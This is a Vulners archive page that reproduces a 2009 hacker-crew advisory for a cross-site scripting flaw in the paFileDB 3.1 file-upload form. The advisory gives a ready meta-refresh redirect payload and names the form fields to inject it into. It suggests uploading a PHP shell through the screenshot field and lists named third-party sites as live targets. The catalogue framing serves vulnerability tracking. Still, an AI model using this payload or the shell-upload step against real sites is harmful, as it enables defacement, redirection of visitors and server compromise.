Vulners
Lucene search
paFileDB 3.1 Cross Site Scripting
`
you can copy the exploit source from :
http://www.hell-z0ne.org/pafiledb.txt
[*]##############################################
[+] |____ViRuS_HiMa@YouR SyS__|__\ #
[+] |______________________|___||\*___ #
[+] |______________________|___||""|"*\___, #
[+] |______________________|___||""|*"|___|| #
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
[+]======================================================================||
[*] Title : paFileDB 3.1 Xss Vuln as Redirecting Method . ||
[!] Author : ViRuS_HiMa ||
[!] My Site : wWw.HeLL-z0ne.org ||
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||
[!] Location : Null,Null,Data+From+Egypt+Where+City_Name=Cairo-- ||
[!]======================================================================||
[!] [H]eL[L] [Z]on[E] [C]re[W] ||
[!]======================================================================||
Description :
paFileDB Is a web library witch allow you to upload & download files
to your site , bla bla bla :p
Bug :
it was vulned be4 to upload your evil files , from :
www.sitename.com/PfdPath/dload.php?action=user_upload
some sites is asking you to register , , and others wasnt accept
extensions except Images extensions , and more of problems .
so we gonna use the same exploit but as xss method ,
Live Demo :
http://forum.cicero-project.net/dload.php?action=user_upload
http://sylvanna.3e-online.org/phpBB2/dload.php?action=user_upload
Enter the url , use this code :
">"">><meta http-equiv="Refresh" content="0;url=http://hell-z0ne.org">"">
write the code in this fields :
"File Name","Short Description","Long Description"
and write any thing in the other fields ,
in "Category" field you have to choose an category whech have the Negative mark "-"
in Screenshot field you can upload your phpshell ,
if dosnt accept you can upload any image , what ever ,
now press on Add File , Then go to :
www.sitename.com/PfdPath/dload.php
live demo :
http://sylvanna.3e-online.org/phpBB2/dload.php
http://forum.cicero-project.net/dload.php
and enter the category where you post your xss code , ,
cool its redirecting the site to your url that you put in the xss code
http://hell-z0ne.org
">"">><meta http-equiv="Refresh" content="0;url=http://hell-z0ne.org">"">
[!]==============================================
[!] ya providor y2goog we m2goog 3amlen eh :p [!]
[!] Selamat Datang saudraku Black_Raptor :) [!]
[!]=================================================================================
[!] Greatz : Providor,HcJ,ExH,Sina,Hakxer,oXide,Dr-Plus,Mo3tz,Prof.Selim, [!]
[!] X@Injector,Maestro-dz,Kasper-ksa,Qahtan-Sniper,Mr.G7eeM And ze Otherz[!]
[!]==================================================================================
_________________________________________________________________
Windows Live Hotmail: Your friends can get your Facebook updates, right from Hotmail®.
http://www.microsoft.com/middleeast/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:en-xm:SI_SB_4:092009`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Dec 2009 00:00Current
7.4High risk
Vulners AI Score7.4